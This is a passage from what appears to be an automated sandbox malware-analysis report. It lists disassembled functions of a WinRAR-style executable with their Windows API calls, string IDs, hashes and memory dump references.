                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
                                                                                                                                                                                                                                                        • String ID: .zipx$.zx$z%s%02d
                                                                                                                                                                                                                                                        • API String ID: 2859674139-515631857
                                                                                                                                                                                                                                                        • Opcode ID: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                                                                                                                                                                                                                                        • Instruction ID: f1d0a23d25845097440ca83c742b887565238fac99513ccec6b8e4f074022d36
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F871D332A04B8288EB14CF64D4903ED3361EF84798F606236EA4D97B99EF3DD145C780
                                                                                                                                                                                                                                                        Function 00007FF6063AA87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA901
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA90F
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA939
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA97F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF6063AAA83,?,?,?,00007FF6063A87EE,?,?,?,00007FF6063A87A9), ref: 00007FF6063AA98B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                                                                                                        • Instruction ID: 6da68f4a760c588650b8c36f4dc292e7849afa953664dd92e474355ce06b7917
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A31E572B1AB4695EE199B02A9006757394FF48B60F7A2539DD1DC7390DF3EE045D380
                                                                                                                                                                                                                                                        Function 00007FF6063A5094 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50BB
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50D8
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6063A5003,?,?,?,00007FF6063A53BA), ref: 00007FF6063A50F4
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                        • Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                                                                                                        • Instruction ID: 82876cdb41ea52176dd30a11a194743ba580f3206bd13db7d11f9ed8be5d162b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87116134A0DB0381FD5D8F01A9401796391AF08764F793434C90EC6790EE3EB494A6D0
                                                                                                                                                                                                                                                        Function 00007FF6063A9278 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 2889003569-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                        • Instruction ID: d0c6c25476781e912d6458b510ab19eb638204d7ee8739786cb970c81f8b9e8b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B91E173A187818AEB14CB65E8803AD7BB0FB44788F20513AEE8D97B95DF39D191C740
                                                                                                                                                                                                                                                        Function 00007FF6063A83FC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                                                                                                        • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                        • Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                        • Instruction ID: 1264f19b7afffd13fa85c2ccf80a1b5231bcdd7a768c013f73482666869113fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B851B332E0960286EF58DF15E444A793795FB44B98F21A530DE1F87788EF3AE841DB80
                                                                                                                                                                                                                                                        Function 00007FF60639B7B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$Show$Rect
                                                                                                                                                                                                                                                        • String ID: RarHtmlClassName
                                                                                                                                                                                                                                                        • API String ID: 2396740005-1658105358
                                                                                                                                                                                                                                                        • Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                        • Instruction ID: 4b4c082ebe517145652d9bad60c94bb73a8d474ebfc09338bd85998e5fc5efbb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1251A736A0878286EB28DB25F44437AA760FF95B84F246035DE4E87B54DF3EE4058B50
                                                                                                                                                                                                                                                        Function 00007FF6063A3994 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                                                                        • API String ID: 0-56093855
                                                                                                                                                                                                                                                        • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                        • Instruction ID: 120a5a482e5076e0e4609f263d87ede7ed6ca85e220e8ff83195ca0782048381
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121E731A0CB4780FF188B19F84417463A1AB45B88F34613AC98DC73A4EE7EE9959790
                                                                                                                                                                                                                                                        Function 00007FF6063AF490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                        • Instruction ID: 281d35174e0e7b459ea8e375e7eae8f43e06ee20df4935505c6b600aaded469a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F0FF21A19A4681EF588B15F8942796360EF88B94F687039EA4F86664DE3DD484C740
                                                                                                                                                                                                                                                        Function 00007FF6063B7AD4 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                                                                                                        • Instruction ID: 18b912c8a5a27362f53f7a1267ad7540ade5cd0c4f5b9f21f3e1f466f85e3178
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9481AE22F18A1285F7289F6598806BD66B0FF84B98F207139CF0E93691DF3EE445C790
                                                                                                                                                                                                                                                        Function 00007FF606385DB8 Relevance: 7.7, APIs: 5, Instructions: 163filetimeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2398171386-0
                                                                                                                                                                                                                                                        • Opcode ID: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                        • Instruction ID: 3cb2972cbd0866b5cf7878c3c0b8366246d9f2a3d2f9d72b98b110f8487500fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A851E432B18B428DFB98CB75E8003FD63A1AB447A8F206235EE1DC67E4DF7991458380
                                                                                                                                                                                                                                                        Function 00007FF6063B7448 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3659116390-0
                                                                                                                                                                                                                                                        • Opcode ID: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                                                                                                        • Instruction ID: e331e49342c6fde0295ee57d9aac560ecd21fadc2d2d2ad32336dfc9101c69d5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51BE32E14A5189E714CF29E8847AC7BB0FB88798F24A135DF4E87A98DF39D142C740
                                                                                                                                                                                                                                                        Function 00007FF6063B28A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 190572456-0
                                                                                                                                                                                                                                                        • Opcode ID: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                                                                                                        • Instruction ID: d50e4a7d415dc2445d95762f4c6360729056ccfea5c0d645f1fb9e2aff6c1400
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C41E862B19E4281FA1D9B1258046B6B391BF58BE0F297635DE1ECB784DF3EE1508780
                                                                                                                                                                                                                                                        Function 00007FF6063B8BE8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                                                                                                        • Instruction ID: 915b7a9465993b8aed139077b2e70fb42846ccfbcd2d60899acb42e9d72f3a95
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE11A0F6E1DE0305FAAC1128E89237991466F553B0F387734EB6EC66D6CE7EA84442C1
                                                                                                                                                                                                                                                        Function 00007FF6063A3928 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
